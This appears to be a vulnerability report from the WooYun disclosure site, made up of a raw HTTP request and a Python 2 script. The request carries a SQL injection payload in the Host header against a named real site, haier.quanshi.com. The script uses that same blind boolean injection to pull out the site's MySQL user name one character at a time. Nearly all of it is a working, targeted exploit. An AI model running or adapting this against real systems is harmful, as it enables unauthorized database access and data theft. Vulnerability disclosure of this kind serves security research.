WooYun.org

GET / HTTP/1.1
Host: haier.quanshi.com%' AND length(user())=17 AND '000JkpN'!='000JkpN%
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=Rk0SoIqoQKFyzUuiYenpbJEELfbvUy4%252B.A
Connection: keep-alive

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
print 'Start to retrive MySQL User:\n'
user = ''
for i in range(1, 18):
    for payload in payloads:
        print '.',
        s = "haier.quanshi.com%%' AND ascii(mid(lower(user()),%s,1))=%s AND '5'!='5%%" % (i, ord(payload))
        headers["Host"]=s
		
        conn = httplib.HTTPConnection('haier.quanshi.com', timeout=60)
        conn.request(method='GET',
                         url='/',
                         headers=headers)
        html_doc = conn.getresponse().read().decode('utf-8')
        conn.close()
        #print html_doc
        
        if html_doc.find(u'云会议(') > 0:
            user += payload
            sys.stdout.write('\r[In Progress]' + user)
            sys.stdout.flush()
            break
print '[Done]MySQL user is %s' % user